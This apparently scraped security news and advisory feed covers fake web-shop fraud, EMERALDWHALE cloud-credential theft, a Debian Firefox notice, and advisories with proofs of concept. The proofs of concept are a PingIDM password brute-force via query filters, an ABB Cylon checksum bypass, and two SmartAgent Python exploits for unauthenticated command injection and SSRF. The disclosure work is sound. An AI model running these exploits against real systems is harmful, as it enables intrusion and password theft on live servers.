Fraudsters running the Phish 'n Ships campaign infected legitimate website and used SEO poisoning to redirect shoppers to their fake web shops

Researchers at the Satori Threat Intelligence and Research team have published their findings about a group of cybercriminals that infect legitimate web shops to create and promote fake product listings.

The threat, dubbed “Phish ‘n Ships” by the researchers, reportedly infected more than 1,000 websites and built 121 fake web stores to trick consumers. Estimated losses are in the region of tens of millions of dollars over the past five years.

The group infected legitimate web shops with a malicious payload that would redirect visitors to web shops under their own control. While visiting such an affected web shop the visitor would be served fake product listings. When they clicked on the link for that item, hundreds of thousands of victims were redirected.

The fraudsters also made sure that their fake product listings contained metadata that put them near the top of search engine rankings for those items. SEO poisoning is a technique employed by cybercriminals to manipulate search engine results, making harmful websites or advertisements appear at the top of search results.

On the fake web shop, one of four targeted third-party payment processors collects credit card info and confirms a “purchase,” but the product never arrives.

The fraudsters used several established vulnerabilities to infect a wide variety of web shops.

For the users it’s not just the payment for an article they’ll never receive and the disappointment about not getting that sought-after article, but there is also the risk of providing cybercriminals with their payment card information.

The campaign has been disrupted for a large part due to the efforts of the researchers, but they warn that part of it is still active.

**So, what can consumers do to stay safe?**

Keep an eye on the website displayed in the address bar. Did the advertisement you clicked on take you to the expected web shop? And when the checkout process runs through a different web shop, this is another reason for alarm.

Be especially cautious when you are looking for hard-to-get items, because this is what the group specializes in.

If you are suspicious, it’s a good idea to try the input validation of the shipping information. The fraudsters do not care whether you fill out a real phone number or street address since they have no intention of shipping anything, so the validation process does not work. On a legitimate web shop this should work and warn visitors about invalid entries.

Malwarebytes’ web protection module and Browser Guard block the IP addresses in use by this group.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 1,000+ web shops infected by &#8220;Phish ‘n Ships&#8221; criminals who create fake product listings for in-demand products 

Operation EMERALDWHALE compromises over 15,000 cloud credentials, exploiting exposed Git and Laravel files. Attackers use compromised S3 buckets…

Operation EMERALDWHALE compromises over 15,000 cloud credentials, exploiting exposed Git and Laravel files. Attackers use compromised S3 buckets for storage, increasing the risks of phishing and cloud account breaches.

The Sysdig Threat Research Team discovered a global operation called EMERALDWHALE, which targeted Git configurations, resulting in over 15,000 cloud service credentials being stolen. The primary goal of stealing credentials was phishing and spam, with the credentials potentially worth hundreds of dollars per account.

****The Attack Chain****

The campaign used private tools to abuse misconfigured web services, allowing attackers to steal credentials, clone repositories, and extract cloud credentials from their source code. Over 10,000 private repositories were collected, and the stolen data was stored in a previous victim’s S3 bucket.

The Sysdig Threat Research Team reported that attackers used tools such as httpx and Masscan to scan large portions of the internet for servers with exposed Git configuration files (/.git/config) and Laravel environment files (.env). Upon finding exposed files, attackers leveraged tools like MZR V2 and Seyzo-v2 to extract sensitive information, including usernames, passwords, and API keys, using regular expressions to locate relevant data within the files.

The stolen credentials enabled attackers to clone private repositories, exposing additional sensitive data, such as source code. Verified credentials were then tested across various cloud services to find valid ones, which were afterwards used for malicious activities, including phishing, spam campaigns, or further compromises of cloud accounts. Ultimately, the attackers uploaded stolen data to compromised S3 buckets.

****EMERALDWHALE’s Tools of Choice****

The investigation identified two main tools used by EMERALDWHALE: MZR V2 (MIZARU) and Seyzo-v2. MZR V2, a suite of Python and shell scripts, supports target discovery, credential extraction, repository cloning, and credential validation. Similarly, Seyzo-v2 automates credential theft from exposed Git configurations through scripts, enabling attackers to locate and extract sensitive data efficiently.

In addition to Git configurations, EMERALDWHALE also targeted exposed Laravel environment files (.env). These files often contain sensitive information like database credentials and cloud service API keys. Multigrabber v8.5 is a popular tool used to exploit vulnerabilities in Laravel and steal this sensitive data.

Operation EMERALDWHALE is one of the examples of how the stolen credentials market has become a lucrative business for cybercriminals. For example, target lists of exposed Git configurations were found to be sold for around $100. Valid cloud service credentials can also be sold in bulk or through automated shops, fetching a huge profit for attackers.

Tools being sold on Telegram (Via Sysdig Threat Research Team)

The finding shows the importance of proper configuration management in securing sensitive information. Ensuring Git configuration files are not publicly accessible, limiting access to necessary variables, and conducting regular vulnerability scans are crucial to staying protected.

“This attack shows that secret management alone is not enough to secure an environment. There are just too many places credentials could leak from. Monitoring the behaviour of any identities associated with credentials is becoming a requirement to protect against these threats,” the report read.

Rom Carmel, Co-Founder and CEO at Apono, weighed in on the recent development stating “This is yet another example of how credentials remain a top target for hackers who follow the adage, ‘teach a man to phish, and he’ll have access for a lifetime.’_“_

“With the right credentials, attackers can access all resources an identity is privileged to, creating an endless list of potential targets. Given the rise in leaked credentials and the availability of phishing kits bypassing MFA, organizations must adopt an ‘assumed breach’ posture.”

1.  Best Practices for Cloud Computing Security
2.  Abandoned S3 Buckets Used for Malicious Payloads
3.  350 million credentials exposed on misconfigured AWS S3 bucket
4.  iOS and Android Users at Risk as Popular Apps Expose Cloud Keys
5.  AI Firm’s Misconfigured Server Leaked 5.3TB of Mental Health Records

EMERALDWHALE Steals 15,000+ Cloud Credentials, Stores Data in S3 Bucket

Ping Identity PingIDM versions 7.0.0 through 7.5.0 enabled an attacker with read access to the User collection, to abuse API query filters in order to obtain managed and/or internal user's passwords in either plaintext or encrypted variants, based on configuration. The API clearly prevents the password in either plaintext or encrypted to be retrieved by any other means, as this field is set as protected under the User object. However, by injecting a malicious query filter, using password as the field to be filtered, an attacker can perform a blind brute-force on any victim's user password details (encrypted object or plaintext string).

    SEC Consult Vulnerability Lab Security Advisory < 20241030-0 >=======================================================================              title: Query Filter Injection            product: Ping Identity PingIDM (formerly known as ForgeRock Identity                     Management) vulnerable version: v7.0.0 - v7.5.0 (and older unsupported versions)      fixed version: various patches; v8.0         CVE number: CVE-2024-23600             impact: medium           homepage: https://backstage.forgerock.com/docs/idm              found: 2024-04-10                 by: Ksandros Apostoli                     Miguel García Martín                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"ForgeRock Identity Management (IDM) software provides centralized, simplemanagement and synchronization of identities for users, devices, and things.IDM software is highly flexible and therefore able to fit almost any use caseand workflow."Source: https://backstage.forgerock.com/docs/idm/7.5/release-notes/preface.html"The combination of Ping Identity and ForgeRock is ushering in a very excitingtime in the identity market. Together, our market-leading identity services willdeliver more choice, unparalleled expertise, and a more complete identitysolution for our customers and partners. We're incredibly excited to welcomeyou all to the future of identity."Source: https://www.pingidentity.com/en/lp/pingandforgerock.htmlBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Query Filter Injection (CVE-2024-23600)Ping Identity PingIDM (formerly known as ForgeRock Identity Management) versions7.5.0 and below, enabled an attacker with read access to the "User" collection,to abuse API query filters in order to obtain managed and/or internal user'spasswords in either plaintext or encrypted variants, based on configuration.The API clearly prevents the password in either plaintext or encrypted to beretrieved by any other means, as this field is set as protected under the"User" object.However, by injecting a malicious query filter, using "password" as the field tobe filtered, an attacker can perform a blind brute-force on any victim's userpassword details (encrypted object or plaintext string).This blind brute-force can be very efficiently conducted since the query filteringsupported by the PingIDM API supports versatile operators such as Starts-With ('sw')or Contains ('co') etc. The sole limitation in this approach is case-insensitivityin the above-described filters adding an additional guessing overhead.The issue potentially extends to all protected fields of custom or built-incollections, but this remains to be tested.Proof of concept:-----------------1) Query Filter Injection (CVE-2024-23600)Two proof of concepts will be provided, one for version 7.3.0 and one for 7.5.0.PoC 1 - PingIDM (v7.3.0) - configured to store plaintext user passwordsIn the vulnerable instance running in this example (version 7.3.0), SEC Consultcreated a test user with the following credentials: `secUser1:aAqQ1234!`.A benign query filter in PingIDM can be crafted from the administrativeUI to filter, for example, users by their username (the password field is notpresented as available for filtering in the UI):HTTP Request```GET /openidm/managed/user?_queryFilter=userName+sw+"sec" HTTP/2Host: $HOSTCookie: route=1712737028.694.31674.440043|b75f0b2274c1023ba864392bb04e5ca3; i18next=en-us; session-jwt=[redacted]Accept-Api-Version: resource=1.0Accept: application/jsonReferer: https://$HOST/api/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, i```HTTP Response```HTTP/2 200 OKDate: Wed, 10 Apr 2024 13:05:13 GMTContent-Type: application/json;charset=utf-8Content-Length: 534Cache-Control: no-storeContent-Security-Policy: default-src 'none';frame-ancestors 'none';sandboxCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originExpires: 0Pragma: no-cacheSet-Cookie: session-jwt=[redacted]Path=/; HttpOnlyX-Content-Type-Options: nosniffX-Frame-Options: DENYVary: Accept-Encoding, User-AgentStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Forgerock-Transactionid: 4261c9f68aa23e492ad57a19973188a9{    "result": [        {            "_id": "0a0f9700-1f7e-498c-967d-b24a0b3ab301",            "_rev": "0cc5575b-ce37-47c1-9beb-408b477c924e-1665022",            "userName": "secUser1",            "accountStatus": "active",            "postalCode": "8046",            "stateProvince": "ZH",            "postalAddress": "Flurstrasse",            "description": "Pentest User 1",            "country": "CH",            "city": "Zurich",            "givenName": "SEC",            "sn": "Consult",            "mail": "secuser1@sec-consult.com",            "preferences": {                "updates": true,                "marketing": false            }        }    ],    "resultCount": 1,    "pagedResultsCookie": null,    "totalPagedResultsPolicy": "NONE",    "totalPagedResults": -1,    "remainingPagedResults": -1}```Note in the request/response pair above, that the query filter sent over thepresented API request was used to query all users with 'userName' starting('sw') with the string "sec". As expected the test user 'secUser1'was returned. In addition, observe that the password field is never to bereturned in any form (plaintext or encrypted) by the API.Despite not being available for filtering in either the UI or API documentation,the 'password' field can be used instead of 'userName' in the example aboveto query users based on their password. In case the PingIDM instance has beenconfigured to store user passwords persistently in plaintext, it can be querieddirectly as shown in the request below:HTTP Request```GET /openidm/managed/user?_queryFilter=password+sw+"a" HTTP/2Host: $HOSTCookie: route=1712737028.694.31674.440043|b75f0b2274c1023ba864392bb04e5ca3; i18next=en-us; session-jwt=[redacted]Accept-Api-Version: resource=1.0Accept: application/jsonReferer: https://$HOST/api/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, i```HTTP Response```HTTP/2 200 OKDate: Wed, 10 Apr 2024 13:07:17 GMTContent-Type: application/json;charset=utf-8Content-Length: 534Cache-Control: no-storeContent-Security-Policy: default-src 'none';frame-ancestors 'none';sandboxCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originExpires: 0Pragma: no-cacheSet-Cookie: session-jwt=[redacted]Path=/; HttpOnlyX-Content-Type-Options: nosniffX-Frame-Options: DENYVary: Accept-Encoding, User-AgentStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Forgerock-Transactionid: 4261c9f68aa23e492ad57a19973188a9{    "result": [        {            "_id": "0a0f9700-1f7e-498c-967d-b24a0b3ab301",            "_rev": "0cc5575b-ce37-47c1-9beb-408b477c924e-1665022",            "userName": "secUser1",            "accountStatus": "active",            "postalCode": "8046",            "stateProvince": "ZH",            "postalAddress": "Flurstrasse",            "description": "Pentest User 1",            "country": "CH",            "city": "Zurich",            "givenName": "SEC",            "sn": "Consult",            "mail": "secuser1@sec-consult.com",            "preferences": {                "updates": true,                "marketing": false            }        }    ],    "resultCount": 1,    "pagedResultsCookie": null,    "totalPagedResultsPolicy": "NONE",    "totalPagedResults": -1,    "remainingPagedResults": -1}```As it can be noticed in the request above, all users with a password startingwith 'a' (case insensitive) were queried and as expected, user 'secUser1' withpassword 'aAqQ1234!' was returned. For an additional sanity check, SEC Consultnext queried all users with password starting with 'aR'. Since no users areto be found in the deployed instance with a matching password, no entriesare returned as it can be seen below:HTTP Request```GET /openidm/managed/user?_queryFilter=password+sw+"aR" HTTP/2Host: $HOSTCookie: route=1712737028.694.31674.440043|b75f0b2274c1023ba864392bb04e5ca3; i18next=en-us; session-jwt=[redacted]Accept-Api-Version: resource=1.0Accept: application/jsonReferer: https://$HOST/api/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, i```HTTP Response```HTTP/2 200 OKDate: Wed, 10 Apr 2024 13:08:01 GMTContent-Type: application/json;charset=utf-8Content-Length: 138Cache-Control: no-storeContent-Security-Policy: default-src 'none';frame-ancestors 'none';sandboxCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originExpires: 0Pragma: no-cacheSet-Cookie: session-jwt=[redacted]Path=/; HttpOnlyX-Content-Type-Options: nosniffX-Frame-Options: DENYVary: Accept-Encoding, User-AgentStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Forgerock-Transactionid: 4261c9f68aa23e492ad57a19973188a9{    "result": [],    "resultCount": 0,    "pagedResultsCookie": null,    "totalPagedResultsPolicy": "NONE",    "totalPagedResults": -1,    "remainingPagedResults": -1}```However, if the attacker correctly guesses the second letter of the password,e.g., by querying for passwords starting with 'aA', we observe that the same useris returned as before:HTTP Request```GET /openidm/managed/user?_queryFilter=password+sw+"aA" HTTP/2Host: $HOSTCookie: route=1712737028.694.31674.440043|b75f0b2274c1023ba864392bb04e5ca3; i18next=en-us; session-jwt=[redacted]Accept-Api-Version: resource=1.0Accept: application/jsonReferer: https://$HOST/api/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, i```HTTP Response```HTTP/2 200 OKDate: Wed, 10 Apr 2024 13:09:25 GMTContent-Type: application/json;charset=utf-8Content-Length: 534Cache-Control: no-storeContent-Security-Policy: default-src 'none';frame-ancestors 'none';sandboxCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originExpires: 0Pragma: no-cacheSet-Cookie: session-jwt=[redacted]Path=/; HttpOnlyX-Content-Type-Options: nosniffX-Frame-Options: DENYVary: Accept-Encoding, User-AgentStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Forgerock-Transactionid: 4261c9f68aa23e492ad57a19973188a9{    "result": [        {            "_id": "0a0f9700-1f7e-498c-967d-b24a0b3ab301",            "_rev": "0cc5575b-ce37-47c1-9beb-408b477c924e-1665022",            "userName": "secUser1",            "accountStatus": "active",            "postalCode": "8046",            "stateProvince": "ZH",            "postalAddress": "Flurstrasse",            "description": "Pentest User 1",            "country": "CH",            "city": "Zurich",            "givenName": "SEC",            "sn": "Consult",            "mail": "secuser1@sec-consult.com",            "preferences": {                "updates": true,                "marketing": false            }        }    ],    "resultCount": 1,    "pagedResultsCookie": null,    "totalPagedResultsPolicy": "NONE",    "totalPagedResults": -1,    "remainingPagedResults": -1}```This indicates that an attacker can efficiently brute-force users' passwords.PoC 2: PingIDM (v7.5.0) - configured to store encrypted user passwordsPingIDM by default stores a user's password encrypted symmetrically using aprivate key that is created upon the first startup of the platform and isstored in the application key-store under '{installation-path}/security/keystore.jceks'.The encrypted password is represented by an object rather than a string. An exampleof an encrypted password JSON object is shown below:```  "username" : "anonymous",  "password" : {                        "$crypto" : {                            "type" : "x-simple-encryption",                            "value" : {                                "cipher" : "AES/CBC/PKCS5Padding",                                "stableId" : "openidm-sym-default",                                "salt" : "9fwdc+Vp1LxDno0YC6bXAA==",                                "data" : "JtFAY+EupwCSLbH06d5OPA==",                                "keySize" : 16,                                "purpose" : "idm.config.encryption",                                "iv" : "Aaek9zviMgZVz/fvOOobIQ==",                                "mac" : "IhKQTvyjcJqw1aW5BMBZpQ=="                            }                       }                },```While at first glance this object structure seems to break the query filterinjection from the previous example, it was found that all encrypted passwordfields can be queried in the exact same way using the '_queryFilter' GETparameter, and by fully specifying their path within the JSON object, forexample:```GET /openidm/managed/user?_queryFilter=password/$crypto/value/data+sw+"J"```The above request can be modified to include all other fields such as cipher,salt, data, iv, mac, etc. Obtaining a cleartext password in this example,would be clearly more challenging, as it would entirely depend on the securityof the encryption key utilized. However, under certain circumstances(subject to user permissions), users in PingIDM can use the REST API to decryptencrypted objects without the need for the key, as shown in the documentation:```curl \--header "X-OpenIDM-Username: openidm-admin" \--header "X-OpenIDM-Password: openidm-admin" \--header "Content-Type: application/json" \--cacert ca-cert.pem \--request POST \--data '{  "type": "text/javascript",  "globals": {    "val": {      "$crypto": {        "type": "x-simple-encryption",        "value": {          "cipher": "AES/CBC/PKCS5Padding",          "stableId": "openidm-sym-default",          "salt": "qAS/eG7zdnFyK5H8lXvqTA==",          "data": "zewf6hR1yjp34EFJqUGpdnzzFCPJs2IaX4V97jdQlSI=",          "keySize": 16,          "purpose": "idm.password.encryption",          "iv": "A4pIiY6kG6t0uLyLmJAoWQ==",          "mac": "sFDJqg0Mmp0Ftl+1q1Bjzw=="        }      }    }  },  "source":"openidm.decrypt(val);"}' \"https://$HOST/openidm/script?_action=eval"{  "myKey": "myPassword"}```source: https://backstage.forgerock.com/docs/idm/7/security-guide/keystore-encrypt-decrypt.htmlVulnerable / tested versions:-----------------------------The following versions have been tested which were the latest versionavailable at the time of the test:* 7.3.0* 7.5.0The vendor communicated the following affected versions:* 7.0.0 - 7.5.0, specifically 7.0.2, 7.1.3, 7.2, 7.3, 7.4, 7.5 (and older unsupported versions)Vendor contact timeline:------------------------2024-04-17: Contacting vendor through https://support.pingidentity.com/s/security-vulnerability            No response.2024-05-02: Contacting vendor through vulnerability submission form again.            No response.2024-05-23: Contacting CISO via LinkedIn. Immediate response, submitting            advisory details via encrypted email.2024-06-04: Security engineering team responds, acknowledges finding with low risk score.            Patch will be released and CVE be assigned nevertheless.2024-06-11: Asking vendor for coordinated release, timeline, affected/fixed versions, CVE.2024-06-17: Vendor: thoroughly addressed the vulnerability, assigned CVE-2024-23600.            Tentative public date for CVE is 24th June. Because of low risk, fix will be in next            GA release 7.6 and backports to 7.5.x-7.1., acknowledged credits for team,            needs us to submit to HackerOne as well regarding bug bounty donation.2024-06-21: Submitting to HackerOne, proposing coordinated release of our advisory            after patches are available to customers.2024-08-01: PingIdentity informs us that everything is patched and CVE released, awarded bounty.2024-09-25: Following up after vacation absences, preparing our security advisory release,            asking for clarification regarding version numbers; no response2024-10-17: Asking for version numbers and download URLs again            Vendor confirms versions numbers and links.2024-10-22: Informing vendor about planned advisory release next week.2024-10-29: Receiving feedback, version 7.6 won't be released, but 8.0; Adjusting advisory.2024-10-30: Coordinated advisory releaseSolution:---------The vendor provides patches for the affected versions which can be downloaded fromtheir download site. Furthermore, the upcoming release 8.0 includes the fixes as well:https://backstage.forgerock.com/downloads/browse/idm/all/productId:idmVendor security advisory with further information:https://backstage.forgerock.com/knowledge/advisories/article/a95212747Workaround:-----------For custom roles, a granular permission selection can be made on allobject's fields allowing 'Read', 'Read/Write', and 'None' access options.In the User object, the 'password' field is configurable to thesepermissions as well, even though this field can never be retrievedor read from any API endpoints or UI (rightfully so). If thepermissions for the 'password' field under the user role are setto 'None', this will prevent also queries from being executed onthat field. By default, when assigning read permissions to an object,all fields are marked as 'Read', as expected, therefore this changeneeds to be done manually.Unfortunately, for built-in roles, e.g. 'openidm-admin', these granularpermissions cannot be set, therefore this workaround won't work.Advisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Ksandros Apostoli, Miguel García Martín / @2024

Ping Identity PingIDM 7.5.0 Query Filter Injection

ABB Cylon Aspect version 3.08.01 has a vulnerability in caldavInstall.php, caldavInstallAgendav.php, and caldavUpload.php files, where the presence of an EXPERTMODE parameter activates a badassMode feature. This mode allows an unauthenticated attacker to bypass MD5 checksum validation during file uploads. By enabling badassMode and setting the skipChecksum parameter, the system skips integrity verification, allowing attackers to upload or install altered CalDAV zip files without authentication. This vulnerability permits unauthorized file modifications, potentially exposing the system to tampering or malicious uploads.

    ABB Cylon Aspect 3.08.01 (badassMode) File Upload MD5 Checksum BypassVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS system has a vulnerability in caldavInstall.php,caldavInstallAgendav.php, and caldavUpload.php files, where the presenceof an EXPERTMODE parameter activates a badassMode feature. This mode allowsan unauthenticated attacker to bypass MD5 checksum validation during fileuploads. By enabling badassMode and setting the skipChecksum parameter, thesystem skips integrity verification, allowing attackers to upload or installaltered CalDAV zip files without authentication. This vulnerability permitsunauthorized file modifications, potentially exposing the system to tamperingor malicious uploads.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5860Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5860.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ head caldavInstall.php caldavInstallAgendav.php==> caldavInstall.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>==> caldavInstallAgendav.php <==<?php$badassMode = false;if (isset($_GET["EXPERTMODE"])) {    $badassMode = true;}?><html><head>1. GET /caldavInstall.php?EXPERTMODE (FE)2. GET /caldavInstallAgendav.php?EXPERTMODE (FE)3. POST /caldavUpload.php -d "skipChecksum=1" (BE)

ABB Cylon Aspect 3.08.01 File Upload MD5 Checksum Bypass

Debian Linux Security Advisory 5801-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, cross-site scripting, spoofing or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5801-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 31, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-10458 CVE-2024-10459 CVE-2024-10460 CVE-2024-10461                  CVE-2024-10462 CVE-2024-10463 CVE-2024-10464 CVE-2024-10465                  CVE-2024-10466 CVE-2024-10467Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, cross-site scripting, spoofing or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.4.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcjhjMACgkQEMKTtsN8TjbUdw/+M/mtjyJ4H/OjhGZdzDOsjIzCTR3FDRrNXuh7j7fjLcd+q6vSLrAZEqhFSnx2oJ3UtLX9IUxkfqBG425XZ1E3EPd9rxFuKy7uSHFqhbXp+h5sEahf3r9Jyf6v6JKfo7TBBZ/ycr3uix1GtFGcbhkrmXZuNWUuz33w4QQS+3O00Ukbsm6UhE4pdXHMnTesJN77kKRepX0W8/Y8wOg0+8MVBTBhKPfISf94x+shWxBpMrCj80lDvoZ6y3sO/VgtcwMBgcvo8le6nvetyzyOt2syiE65qFlMvSG9niT+1wdiv42tRMqjLwvfxF5GpkiFF8N7p6bD11SAxiywBU/60/WGTIE0MIWlifKzUeed5Xs84xk3mvKc8mZ9Z/WuGcIHJEY8tS1R8KcDfwnKRdYobtMyBUgb6WJNvobUWkGT3nS/ml2dSLs5Pjd3ulmMELhG0xsH+YuG0MceSFjuA9HJqCYZ3a/Q5i2jyUIj+RkivVxBVwsM5BYJlVYl7CaPTxbARJEK7QtjrURFnOu57M+T+AsNx+xjIRzouWN1bAXQT49VgViVFtH7jkpc1rbXV74s8IkYi50ED0Ny9rdN6HAahSlrt5TmIccYhaiQZCDEPAC5J6OpE30MXGoCAYcW2/4e9oiIwrVjw1m+ePt1U1yD+20k7i2W1LB2T0e7pwaFl2FgR+k==Tz4t-----END PGP SIGNATURE-----

Debian Security Advisory 5801-1

SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.

    # Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.Vulnerable code snippet from youtubeInfo.php:"""$youtubeUrl=$_POST["youtubeUrl"];$command = 'youtube-dl -j ' . $youtubeUrl;echo  shell_exec($command);"""Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smarts-srlcom.com?youtubeInfo.php"command = input("Enter the command you want to run $EX: id$: ")postdata = {    "youtubeUrl": ";" + command}response = requests.post(url, data=postdata, verify=False)print(response.text)

SmartAgent 1.1.0 Remote Code Execution

SmartAgent version 1.1.0 suffers from a server-side request forgery vulnerability.

    # Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script  https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.The GET request includes the vulnerable parameter "url".Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smartagent.[client].com/FB/getFbVideoSource.php"port = input("Enter the port you want to check: ")parameter = {  "url": "http://127.0.0.1:" + port}response = requests.get(url, data=parameter, verify=False)if response.status_code == 200:    print(f"Port {port} is open on the server")else:    print(f"Port {port} closed")

SmartAgent 1.1.0 Server-Side Request Forgery

